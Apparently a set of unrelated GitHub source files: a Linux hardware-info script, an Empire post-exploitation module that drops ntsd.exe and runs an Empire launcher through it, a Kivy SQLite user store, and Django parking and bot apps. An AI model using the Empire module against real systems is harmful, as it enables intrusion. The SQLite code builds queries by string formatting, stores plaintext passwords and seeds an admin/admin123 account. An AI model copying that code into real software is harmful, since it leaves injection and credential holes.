try:
cpus = open('/proc/cpuinfo', 'r').read()
except Exception as e:
cpu_err(e)
cpu = cpus.split('\n\n')
if not cpu:
return
cpu = cpu[0] # Get only the first CPU identifier.
model = re.search(r'(?<=model name\t\: ).+(?=\n)', cpu)
flagers = re.search(r'(?<=flags\t\t\: ).+(?=\n)', cpu)
cores = re.search(r'(?<=cpu cores\t\: ).+(?=\n)', cpu)
# Count the amount of times 'processor'
# is matched, since threads are enumerated
# individually.
data = {}
if model:
data = {
model.group(0): {}
}
else:
return
if flagers:
flagers = flagers.group(0)
# List of supported SSE instructions.
data[model.group(0)]['SSE'] = list(sorted([flag.replace('_', '.') for flag in flagers.split(' ') if 'sse' in flag.lower(
) and not 'ssse' in flag.lower()], reverse=True))[0].upper()
data[model.group(
0)]['SSSE3'] = 'Supported' if 'ssse3' in flagers else 'Not Available'
if cores:
data[model.group(0)]['Cores'] = cores.group(0)
try:
data[model.group(0)]['Threads'] = open(
'/proc/cpuinfo', 'r').read().count('processor')
except:
pass
self.info.get('CPU').append(data)
def gpu_info(self):
for file in os.listdir('/sys/class/drm/'):
# DRM devices (not FBDev) are enumerated with the format `cardX`
# inside of sysfs's DRM directory. So we look for those, and traverse
# them. We look for the `device` and `vendor` file, which should always be there.
if 'card' in file and not '-' in file:
path = f'/sys/class/drm/{file}'
try:
ven = open(f'{path}/device/vendor', 'r').read().strip()
dev = open(f'{path}/device/device', 'r').read().strip()
model = self.pci.get_item(dev[2:], ven[2:]).get('device')
except Exception as e:
continue
igpu = self.intel.get(dev.upper()[2:], {})
if igpu:
CPU = self.info['CPU'][0][list(
self.info['CPU'][0].keys())[0]]
self.info['CPU'][0] = {
list(self.info['CPU'][0].keys())[0]: CPU | {
'Codename': igpu.get('codename')
}
}
self.info.get('GPU').append({
model: {
'Device ID': dev,
'Vendor': ven
}
})
def net_info(self):
for file in os.listdir('/sys/class/net'):
path = f'/sys/class/net/{file}/device'
# We ensure that the enumerated directory in the sysfs net
# directory is a valid card, since it'll contain a `vendor` and
# `device` file.
if os.path.isfile('{}/device'.format(path)):
try:
ven = open(f'{path}/vendor', 'r').read().strip()
dev = open(f'{path}/device', 'r').read().strip()
model = self.pci.get_item(dev[2:], ven[2:]).get('device')
except:
return
else:
self.info.get('Network').append({
model: {
'Device ID': dev,
'Vendor': ven
}
})
def audio_info(self):
for file in os.listdir('/sys/class/sound'):
# Sound devices are enumerated similarly to DRM devices,
# with the format `cardX`, so we look for those, and look
# for `vendor` and `device` files.
if 'card' in file.lower() and not '-' in file.lower():
path = f'/sys/class/sound/{file}/device'
try:
ven = open(f'{path}/vendor', 'r').read().strip()
dev = open(f'{path}/device', 'r').read().strip()
model = self.pci.get_item(dev[2:], ven[2:]).get('device')
except:
continue
else:
self.info.get('Audio').append({
model: {
'Device ID': dev,
'Vendor': ven
}
})
def mobo_info(self):
# Details about the motherboard is
# located in /sys/devices/virtual/dmi/id
#
# So we simply look for `board_name` and
# `board_vendor` to extract its model name,
# and its vendor's name.
try:
path = '/sys/devices/virtual/dmi/id'
model = open(f'{path}/board_name', 'r').read().strip()
vendor = open(f'{path}/board_vendor', 'r').read().strip()
except:
return
if model:
data = {
'Model': model
}
if vendor:
data['Vendor'] = vendor
self.info['Motherboard'] = data
def input_info(self):
# This is the simplest way of reliably
# obtaining the path of the input devices
# located in sysfs. Ironically, by looking
# into procfs.
#
# Out of the things we look for,
# it contains the device name, and its sysfs path.
try:
devices = open('/proc/bus/input/devices', 'r').read().strip()
sysfs = []
except:
return
for device in devices.split('\n\n'):
if not any((x in device.lower() for x in ('touchpad', 'trackpad', 'synaptics', 'usb'))):
continue
for line in device.split('\n'):
if 'sysfs' in line.lower():
sysfs.append('/sys{}'.format(line.split('=')[1]))
for path in sysfs:
if os.path.isfile('{}/id/vendor'.format(path)):
try:
dev = '0x' + open(f'{path}/id/product', 'r').read().strip()
ven = '0x' + open(f'{path}/id/vendor', 'r').read().strip()
except:
continue
else:
if ven and dev:
name = self.pci.get_item(dev[2:], ven[2:], types='usb')
if not name:
continue
self.info['Input'].append({
name.get('device', 'Unknown'): {
'Device ID': dev,
'Vendor': ven
}
})
``` |
{
"source": "1r-f0rhun73r/Empire",
"score": 2
} |
#### File: powershell/code_execution/invoke_ntsd.py
```python
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
import base64
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Ntsd',
'Author': ['<NAME>'],
'Description': ("Use NT Symbolic Debugger to execute Empire launcher code"),
'Software': '',
'Techniques': ['T1127'],
'Background': True,
'OutputExtension': None,
'NeedsAdmin': False,
'OpsecSafe': False,
'Language': 'powershell',
'MinLanguageVersion': '2',
'Comments': [""]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent': {
'Description': 'Agent to run module on.',
'Required': True,
'Value': ''
},
'UploadPath': {
'Description': r'Path to drop dll (C:\Users\Administrator\Desktop).',
'Required': False,
'Value': ''
},
'Listener': {
'Description': 'Listener to use.',
'Required': True,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'BinPath': {
'Description': 'Binary to set NTSD to debug.',
'Required': True,
'Value': "C:\\Windows\\System32\\calc.exe"
},
'Arch': {
'Description': 'Architecture the system is on.',
'Required': True,
'Value': 'x64'
},
'ProxyCreds': {
'Description': r'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
uploadPath = self.options['UploadPath']['Value'].strip()
bin = self.options['BinPath']['Value']
arch = self.options['Arch']['Value']
ntsd_exe_upload_path = uploadPath + "\\" + "ntsd.exe"
ntsd_dll_upload_path = uploadPath + "\\" + "ntsdexts.dll"
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
if arch == 'x64':
ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x64.exe"
ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x64.dll"
elif arch == 'x86':
ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x86.exe"
ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x86.dll"
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/code_execution/Invoke-Ntsd.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = ""
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print(helpers.color("[!] Invalid listener: %s" % (listenerName)))
return ''
else:
l = self.mainMenu.stagers.stagers['multi/launcher']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
launcher = l.generate()
if launcher == '':
print(helpers.color('[!] Error in launcher generation.'))
return ''
else:
launcherCode = launcher.split(' ')[-1]
with open(ntsd_exe, 'rb') as bin_data:
ntsd_exe_data = bin_data.read()
with open(ntsd_dll, 'rb') as bin_data:
ntsd_dll_data = bin_data.read()
exec_write = "Write-Ini %s \"%s\"" % (uploadPath, launcher)
code_exec = "%s\\ntsd.exe -cf %s\\ntsd.ini %s" % (uploadPath, uploadPath, bin)
ntsd_exe_upload = self.mainMenu.stagers.generate_upload(ntsd_exe_data, ntsd_exe_upload_path)
ntsd_dll_upload = self.mainMenu.stagers.generate_upload(ntsd_dll_data, ntsd_dll_upload_path)
script += "\r\n"
script += ntsd_exe_upload
script += ntsd_dll_upload
script += "\r\n"
script += exec_write
script += "\r\n"
# this is to make sure everything was uploaded properly
script += "Start-Sleep -s 5"
script += "\r\n"
script += code_exec
return script
``` |
{
"source": "1rfan/kivymd_skeletor_mobi",
"score": 3
} |
#### File: 1rfan/kivymd_skeletor_mobi/dbobject.py
```python
import sqlite3
class DbObject():
def __init__(self, dbname):
self.dbname = dbname
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
# create tables...
cmd = """CREATE TABLE IF NOT EXISTS tbl_users(
id INTEGER PRIMARY KEY AUTOINCREMENT,
login VARCHAR NOT NULL,
name VARCHAR NOT NULL,
email VARCHAR,
passwd VARCHAR NOT NULL,
active INTEGER NOT NULL)"""
self.curs.execute(cmd)
self.conn.commit()
# self.conn.close()
cmd = """CREATE TABLE IF NOT EXISTS tbl_curr_user(
currid INTEGER,
active INTEGER NOT NULL)"""
self.curs.execute(cmd)
self.conn.commit()
self.conn.close()
# reset tbl_curr_user to null (truncate)..
self.trc_tbl('tbl_curr_user')
# check if admin login already created...
if(self.chk_login_pwd('admin', '<PASSWORD>123') == 0):
# insert default admin login
self.ins_tbl_users('admin', 'Administrator',
'<EMAIL>', 'admin123', 1)
# insert into table tbl_B...
def ins_tbl_users(self, login, name, email, passwd, active):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = """INSERT INTO tbl_users(login, name, email, passwd, active)
VALUES(?,?,?,?,?)"""
data_tuple = (login, name, email, passwd, active)
self.curs.execute(sqltext, data_tuple)
self.conn.commit()
self.conn.close()
def viw_tbl_users(self):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT * FROM tbl_users"
self.curs.execute(sqltext)
rows = self.curs.fetchall()
self.conn.close()
return rows
def chk_login_pwd(self, login, pwd):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT EXISTS(SELECT 1 FROM tbl_users WHERE login='{}' AND passwd='{}' LIMIT 1)".format(
login, pwd)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def chk_exist_user(self, login):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT EXISTS(SELECT 1 FROM tbl_users WHERE login='{}' LIMIT 1)".format(
login)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def get_user_id(self, login):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT id FROM tbl_users WHERE login='{}' LIMIT 1".format(
login)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def get_user_name(self, id):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT name FROM tbl_users WHERE id='{}' LIMIT 1".format(
id)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def get_user_email(self, id):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT email FROM tbl_users WHERE id='{}' LIMIT 1".format(
id)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def get_user_pswd(self, id):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT passwd FROM tbl_users WHERE id='{}' LIMIT 1".format(
id)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def upd_curr_user(self, id):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = """INSERT INTO tbl_curr_user(currid,active)
VALUES(?,?)"""
data_tuple = (id, 1)
self.curs.execute(sqltext, data_tuple)
self.conn.commit()
self.conn.close()
def upd_user_passwd(self, id, nupwd):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = """UPDATE tbl_users SET passwd = '{}' WHERE id = {}""".format(
nupwd, id)
print(sqltext)
self.curs.execute(sqltext)
self.conn.commit()
self.conn.close()
def trc_tbl(self, tbl_name):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "DELETE FROM "+tbl_name
self.curs.execute(sqltext)
self.conn.commit()
self.conn.close()
# return 1
``` |
{
"source": "1ricardo66/Django2.0",
"score": 3
} |
#### File: Estacionamento/core/models.py
```python
from django.db import models
import math
from random import randint
#############################################################
# #
# #
# IMPLEMENTAR UM METODO DE CATEGORIA DE CARROS #
# DEPENDENDO DA CATEGORIA MUDA O Valor DA HORA #
# #
# #
#############################################################
class Cliente(models.Model):
nome = models.CharField(max_length=60)
data_de_nascimento = models.DateField()
cpf = models.CharField(max_length=11)
endereco = models.CharField(max_length=180)
Bairro = models.CharField(max_length=60)
key = models.IntegerField()
def __str__(self):
return self.nome
#Recebe todos os clientes
class Veiculo(models.Model):
nome = models.CharField(max_length=120,null=True,blank=True)
modelo = models.CharField(max_length=120)
placa = models.CharField(max_length=9)
#Seta os veiculos em um form
def __str__(self):
content = (self.nome + ' - ' + self.placa)
return content
class Parametros(models.Model):
valor_hora = models.DecimalField(max_digits=5,decimal_places=2)
valor_mes = models.DecimalField(max_digits=5,decimal_places=2)
def __str__(self):
return "Parametros Gerais"
#Parametros editar depois
class MovRotativo(models.Model):
cliente = models.ForeignKey(Cliente,on_delete=models.CASCADE)
checkin = models.DateTimeField(auto_now=False)
checkout = models.DateTimeField(auto_now=False)
valor_hora = models.DecimalField(max_digits=5,decimal_places=2)
veiculo = models.ForeignKey(Veiculo,on_delete=models.CASCADE)
pago = models.BooleanField(default=False)
def horas_total(self):
return math.ceil((self.checkout - self.checkin).total_seconds() / 3600)
#Função para pegar as horas /// Total_Seconds é uma função do Django
def total (self):
self.valor_total = self.valor_hora * self.horas_total()
return ("%s R$"%self.valor_total)
def __str__(self):
return self.veiculo.placa
class Mensalista(models.Model):
veiculo = models.ForeignKey(Veiculo,on_delete=models.CASCADE)
inicio = models.DateField()
valor_mes = models.DecimalField(max_digits=5,decimal_places=2)
def __str__(self):
return str(self.veiculo) + ' - ' + str(self.inicio)
#Mensalidade editar depois
class MovMensalista(models.Model):
mensalista = models.ForeignKey(Mensalista,on_delete=models.CASCADE)
data_pagamento = models.DateField()
total = models.DecimalField(max_digits=5,decimal_places=2)
#retorna o valor total no mes
# Create your models here.
```
#### File: Estacionamento/core/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from .models import *
def lista_pessoas(request):
pessoa = Cliente.objects.all()
context = {'cliente':pessoa}
return render(request,'core/lista_pessoas.html',context)
def lista_veiculos(request):
veiculos = Veiculo.objects.all()
context = {'veiculos':veiculos}
return render(request,'core/lista_veiculos.html',context)
def movRotativo(request):
mov_rot = MovRotativo.objects.all()
context = {'mov_rot':mov_rot}
return render(request,'core/mov_rotativo.html',context)
# Create your views here.
```
#### File: Geekie/Core/views.py
```python
from django.shortcuts import render
from .models import Cadastro
def index(request):
pessoa = Cadastro.objects.all()
x=pessoa
context = {'pessoa':pessoa,
'x':x,}
return render(request,'core/index.html',context)
# Create your views here.
``` |
{
"source": "1rodriguez/shell-hacks-2020",
"score": 2
} |
#### File: 1rodriguez/shell-hacks-2020/job.py
```python
import firebase_interface
import re
class Job:
def __init__(self, gh_id, job_type, company, location, title, description):
self.id_code = gh_id
self.job_type = job_type
self.company = company
self.location = location
self.title = title
self.description = description
desc_removed_tags = re.sub("(\<\/?[a-z]*\>)|(\<\/?[a-z*]|\d\>)", "",
self.description)
self.sanitized_description = re.sub("\<([a-z*])\s([a-z*]*=.*?)", "",
desc_removed_tags)
self.sanitized_description = re.sub('href=".*?">', "", self.sanitized_description)
def write_to_firestore(self):
doc_ref = firebase_interface.db.collection(u'postings') \
.document(self.id_code)
doc_ref.set({
u'type': self.job_type,
u'company': self.company,
u'location': self.location,
u'position': self.title,
u'plain_description': self.sanitized_description,
})
``` |
{
"source": "1-rphillips/office-recipes",
"score": 2
} |
#### File: office-recipes/Office2019-IndividualApps/MSOffice2019VersionProvider.py
```python
import plistlib
import re
from autopkglib import Processor, ProcessorError
try:
from urllib.request import urlopen # For Python 3
except ImportError:
from urllib2 import urlopen # For Python 2
__all__ = ["MSOffice2019VersionProvider"]
# Installers are all supposed to be multilingual.
# Only Locale and Channel (Prod vs. Insider Slow/Fast) options available
BASE_URL = "https://officecdn.microsoft.com/pr/%s/MacAutoupdate/0409%s2019.xml"
PROD_DICT = {
'Excel': ['XCEL', '525135'],
'OneNote': ['ONMC', '820886'],
'Outlook': ['OPIM', '525137'],
'PowerPoint': ['PPT3', '525136'],
'Word': ['MSWD', '525134']
}
CHANNELS = {
'Production': 'C1297A47-86C4-4C1F-97FA-950631F94777',
'InsiderSlow': '1AC37578-5A24-40FB-892E-B89D85B6DFAA',
'InsiderFast': '4B2D7701-0A4F-49C8-B4CB-0C2D4043F51F',
}
DEFAULT_CHANNEL = "Production"
class MSOffice2019VersionProvider(Processor):
"""Provides the version for an individual, standalone MS Office 2019 product."""
input_variables = {
"product": {
"required": True,
"description": "Name of product to fetch, e.g. Excel.",
},
"channel": {
"required": False,
"default": DEFAULT_CHANNEL,
"description":
("Update feed channel that will be checked for updates. "
"Defaults to %s, acceptable values are one of: %s"
% (DEFAULT_CHANNEL,
", ".join(CHANNELS.keys())))
}
}
output_variables = {
"version": {
"description":
("The installer version as extracted from the Microsoft metadata.")
},
}
def get_version(self, metadata):
"""Extracts the version of the update item."""
# We currently expect the version at the end of the Title key,
# e.g.: "Excel Update 16.19.0 (18110915)"
# Work backwards from the end and break on the first thing
# that looks like a version
match = None
for element in reversed(metadata["Title"].split()):
match = re.match(r"(\d+\.\d+(\.\d)*)", element)
if match:
break
if not match:
raise ProcessorError(
"Error validating Office 2019 version extracted "
"from Title manifest value: '%s'" % metadata["Title"])
version = match.group(0)
return version
def main(self):
"""Gets info about the installer in a channel from MAU metadata."""
self.env["URL"] = "https://go.microsoft.com/fwlink/?linkid=%s" % (PROD_DICT[self.env["product"]][1])
channel_input = self.env.get("channel", DEFAULT_CHANNEL)
if channel_input not in CHANNELS.keys():
raise ProcessorError(
"'channel' input variable must be one of: %s or a custom "
"uuid" % (", ".join(CHANNELS.keys())))
base_url = BASE_URL % (CHANNELS[channel_input], PROD_DICT[self.env["product"]][0])
# Get metadata URL
req = urlopen(base_url)
# Add the MAU User-Agent, since MAU feed server seems to explicitly
# block a User-Agent of 'Python-urllib/2.7' - even a blank User-Agent
# string passes.
req.add_header("User-Agent",
"Microsoft%20AutoUpdate/3.6.16080300 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)")
try:
fdesc = urlopen(req)
data = fdesc.read()
fdesc.close()
except BaseException as err:
raise ProcessorError("Can't download %s: %s" % (base_url, err))
metadata = plistlib.readPlistFromString(data)[0]
self.env["version"] = self.get_version(metadata)
if __name__ == "__main__":
PROCESSOR = MSOffice2019VersionProvider()
PROCESSOR.execute_shell()
``` |
{
"source": "1SAA/ColossalAI",
"score": 2
} |
#### File: colossalai/gemini/stateful_tensor_mgr.py
```python
import functools
import torch
import types
from colossalai.utils.cuda import get_current_device
from colossalai.gemini.tensor_utils import colo_model_data_tensor_move_inline, colo_tensor_mem_usage
from colossalai.gemini.stateful_tensor import StatefulTensor, TensorState
from colossalai.gemini.tensor_placement_policy import TensorPlacementPolicy
from typing import List
class StatefulTensorMgr(object):
"""
Stateful Tensor Manager, inspired from PatrickStar
PatrickStar: Parallel Training of Pre-trained Models via Chunk-based Memory Management
https://arxiv.org/abs/2108.05818
"""
def __init__(self, tensor_placement_policy: TensorPlacementPolicy) -> None:
self._tensor_placement_policy: TensorPlacementPolicy = tensor_placement_policy
self._stateful_tensor_list: List[StatefulTensor] = []
self._compute_list: List[StatefulTensor] = []
self._compute_idx: int = -1
self._cpu_gpu_move_volume = 0
self._warmup = True
def register_stateful_tensor_list(self, tensor_list: List[StatefulTensor]) -> None:
assert self._stateful_tensor_list == [], "Can't register stateful tensors for manager twice"
self._stateful_tensor_list = tensor_list
for t in self._stateful_tensor_list:
assert isinstance(t, StatefulTensor)
t.trans_state = types.MethodType(functools.partial(self._trans_state, t.trans_state), t)
def start_iter(self):
pass
def finish_iter(self):
"""This function must be called when each iteration finishes
"""
self._warmup = False
self._compute_idx = -1
self._cpu_gpu_move_volume = 0
def adjust_layout(self) -> None:
""" Adjust the layout of statefuil tensor according to the information provided
by mem_stats_collector, which should belongs to a Sharded Model.
"""
# find stateful tensor in state COMPUTE
cuda_demand = StatefulTensor.GST_MGR.state_mem['cpu'][TensorState.COMPUTE]
move_to_cuda_tensor_list = []
hold_cuda_tensor_list = []
for tensor in self._stateful_tensor_list:
if tensor.state == TensorState.FREE:
continue
if tensor.device.type == 'cuda':
if tensor.state in [TensorState.HOLD, TensorState.HOLD_AFTER_BWD, TensorState.HOLD_AFTER_FWD]:
hold_cuda_tensor_list.append(tensor)
elif tensor.device.type == 'cpu':
if tensor.state == TensorState.COMPUTE:
move_to_cuda_tensor_list.append(tensor)
else:
raise RuntimeError
self._cpu_gpu_move_volume += self._tensor_placement_policy.evict_tensors(hold_cuda_tensor_list,
cuda_demand=cuda_demand,
warmup=self._warmup,
compute_list=self._compute_list,
compute_idx=self._compute_idx)
# move COMPUTE tensors to CUDA
self._cpu_gpu_move_volume += cuda_demand
for t in move_to_cuda_tensor_list:
colo_model_data_tensor_move_inline(t, get_current_device())
@property
def cpu_gpu_move_volume(self):
return self._cpu_gpu_move_volume
def _trans_state(self, trans_state_func, stateful_tensor, state):
trans_state_func(state)
if state == TensorState.COMPUTE:
self._compute_idx += 1
if self._warmup:
self._compute_list.append(stateful_tensor)
```
#### File: utils/model/colo_init_context.py
```python
from colossalai.utils.cuda import get_current_device
from .utils import InsertPostInitMethodToModuleSubClasses
import torch
# from colossalai.logging import get_dist_logger
from colossalai.tensor import ColoTensor
# _orig_torch_empty = torch.empty
class ColoInitContext(InsertPostInitMethodToModuleSubClasses):
def __init__(self, lazy_memory_allocate: bool = False, device: torch.device = torch.device('cpu')):
"""
Args:
lazy_memory_allocate (bool, optional): whether to allocate memory for the parameter tensors. Defaults to False.
device (torch.device, optional): the device parameters initialized are resident on. Defaults to torch.device('cpu').
"""
super().__init__()
self._lazy_memory_allocate = lazy_memory_allocate
self._device = device
def _post_init_method(self, module: torch.nn.Module, *args, **kwargs):
"""
The function to call at the end of the constructor of each module.
FIXME(fjr) The module may be passed to this function multiple times?
"""
name_list = []
for name, param in module.named_parameters():
if isinstance(param, ColoTensor):
continue
name_list.append((name, param))
save_torch_payload = True if not self._lazy_memory_allocate else False
for name, param in name_list:
delattr(module, name)
setattr(module, name,
ColoTensor.init_from_torch_tensor(tensor=param.to(self._device), save_payload=save_torch_payload))
```
#### File: tests/test_gemini/test_stateful_tensor_mgr.py
```python
import torch
import colossalai
import pytest
import torch.multiprocessing as mp
from colossalai.utils.cuda import get_current_device
from colossalai.gemini.memory_tracer import MemStatsCollector
from colossalai.gemini.memory_tracer import GLOBAL_MODEL_DATA_TRACER
from colossalai.utils.memory import colo_set_process_memory_fraction
from colossalai.zero.sharded_param.sharded_param import ShardedParamV2
from colossalai.gemini.stateful_tensor import TensorState
from colossalai.utils import free_port
from colossalai.testing import rerun_if_address_is_in_use
from torch.nn.parameter import Parameter
from typing import List
from functools import partial
from colossalai.gemini import StatefulTensorMgr
from colossalai.gemini.tensor_placement_policy import AutoTensorPlacementPolicy
class Net(torch.nn.Module):
def __init__(self) -> None:
super().__init__()
# each parameter is 128 MB
self.p0 = Parameter(torch.empty(1024, 1024, 32))
self.p1 = Parameter(torch.empty(1024, 1024, 32))
self.p2 = Parameter(torch.empty(1024, 1024, 32))
def limit_cuda_memory(memory_in_g: float):
cuda_capacity = torch.cuda.get_device_properties(get_current_device()).total_memory
fraction = (memory_in_g * 1024**3) / cuda_capacity
colo_set_process_memory_fraction(fraction)
def run_stm():
# warmup phase use 20% CUDA memory to store params
# only 2 params can be on CUDA
limit_cuda_memory(1.26)
model = Net()
for p in model.parameters():
p.colo_attr = ShardedParamV2(p, set_data_none=True)
GLOBAL_MODEL_DATA_TRACER.register_model(model)
mem_collector = MemStatsCollector()
tensor_placement_policy = AutoTensorPlacementPolicy(mem_stats_collector=mem_collector)
stateful_tensor_mgr = StatefulTensorMgr(tensor_placement_policy)
for p in model.parameters():
stateful_tensor_mgr.register_stateful_param(p.colo_attr)
mem_collector.start_collection()
# Compute order: 0 1 2 0 1
# warmup
# use naive eviction strategy
apply_adjust(model, model.p0, [model.p0], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.sample_overall_data()
apply_adjust(model, model.p1, [model.p0, model.p1], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.sample_overall_data()
apply_adjust(model, model.p2, [model.p1, model.p2], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.sample_overall_data()
apply_adjust(model, model.p0, [model.p0, model.p2], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.sample_overall_data()
apply_adjust(model, model.p1, [model.p1, model.p2], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.finish_collection()
stateful_tensor_mgr.reset()
# warmup done
# only 2 params can be on CUDA
limit_cuda_memory(0.26 / tensor_placement_policy._steady_cuda_cap_ratio)
# use OPT-like eviction strategy
apply_adjust(model, model.p0, [model.p0, model.p1], stateful_tensor_mgr)
apply_adjust(model, model.p1, [model.p0, model.p1], stateful_tensor_mgr)
apply_adjust(model, model.p2, [model.p0, model.p2], stateful_tensor_mgr)
apply_adjust(model, model.p0, [model.p0, model.p2], stateful_tensor_mgr)
apply_adjust(model, model.p1, [model.p1, model.p2], stateful_tensor_mgr)
def apply_adjust(model: torch.nn.Module, compute_param: Parameter, cuda_param_after_adjust: List[Parameter],
stateful_tensor_mgr: StatefulTensorMgr):
compute_param.colo_attr._sharded_data_tensor.trans_state(TensorState.COMPUTE)
for p in model.parameters():
if p is not compute_param and p.colo_attr._sharded_data_tensor.state != TensorState.HOLD:
p.colo_attr._sharded_data_tensor.trans_state(TensorState.HOLD)
stateful_tensor_mgr.adjust_layout()
print_stats(model)
device = torch.device(torch.cuda.current_device())
cuda_param_after_adjust = [hash(p) for p in cuda_param_after_adjust]
for n, p in model.named_parameters():
if hash(p) in cuda_param_after_adjust:
assert p.colo_attr._sharded_data_tensor.device == device, f'{n} {p.colo_attr._sharded_data_tensor.device} vs {device}'
else:
assert p.colo_attr._sharded_data_tensor.device == torch.device('cpu')
def print_stats(model: torch.nn.Module):
msgs = []
for n, p in model.named_parameters():
msgs.append(f'{n}: {p.colo_attr._sharded_data_tensor.state}({p.colo_attr._sharded_data_tensor.device})')
print(f'[ {", ".join(msgs)} ]')
def run_dist(rank, world_size, port):
colossalai.launch(config={}, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
run_stm()
@pytest.mark.dist
@rerun_if_address_is_in_use()
def test_stateful_tensor_manager(world_size=1):
run_func = partial(run_dist, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
# this unit test can pass if available CUDA memory >= 1.5G
test_stateful_tensor_manager()
```
#### File: tests/test_tensor/test_net_tp.py
```python
from tests.components_to_test.registry import non_distributed_component_funcs
import colossalai
import pytest
import torch.multiprocessing as mp
from colossalai.testing import parameterize, rerun_if_address_is_in_use
from colossalai.utils.cuda import get_current_device
from colossalai.utils import free_port
from colossalai.utils import ColoInitContext
from functools import partial
def run_simple_net():
# A simple net with two stacked nn.Linear
get_components_func = non_distributed_component_funcs.get_callable('simple_net')
model_builder, train_dataloader, test_dataloader, optimizer_class, criterion = get_components_func()
with ColoInitContext(device=get_current_device()):
model = model_builder(checkpoint=True)
# we set the Specs for weight of each linear.
# model.proj1.weight.set_spec('1Drow')
# model.proj2.weight.set_spec('1Drow')
for i, (data, label) in enumerate(train_dataloader):
output = model(data)
if criterion:
loss = criterion(output, label)
else:
loss = output
print(loss.torch_tensor())
loss.backward()
if i > 5:
break
# TODO(jzy) check the results with col.nn.Linear?
def run_dist(rank, world_size, port):
config = dict(parallel=dict(tensor=dict(mode="1d", size=world_size),))
colossalai.launch(config=config, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
run_simple_net()
@pytest.mark.skip
@pytest.mark.dist
@parameterize('world_size', [1, 4])
@rerun_if_address_is_in_use()
def test_simple_net(world_size):
run_func = partial(run_dist, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
test_simple_net()
``` |
{
"source": "1samson1/parsing-bot-glory",
"score": 2
} |
#### File: parsing-bot-glory/bot/models.py
```python
from django.db import models
# Create your models here.
class Profile(models.Model):
"""Профили пользователей"""
external_id = models.PositiveIntegerField("ВК ИД")
def __str__(self):
return str(self.external_id)
class Meta:
verbose_name = "Профиль пользователя"
verbose_name_plural = "Профили пользователей"
class Subscribe(models.Model):
"""Подписки пользователей"""
profile = models.ForeignKey(Profile,verbose_name="Пользователь",on_delete=models.CASCADE)
group_subscribe = models.CharField("Подписка на группу",max_length=100)
def __str__(self):
return self.group_subscribe
class Meta:
verbose_name = "Подписки пользователей"
verbose_name_plural = "Подписки пользователей"
class SendedGroups(models.Model):
"""Группы которым отправлено рассписание"""
date = models.DateField("Дата", auto_now_add=True)
group = models.CharField("Группа",max_length=100)
def __str__(self):
return self.group
class Meta:
verbose_name = "Расписание отправленое группам"
verbose_name_plural = "Расписание отправленое группам"
``` |
{
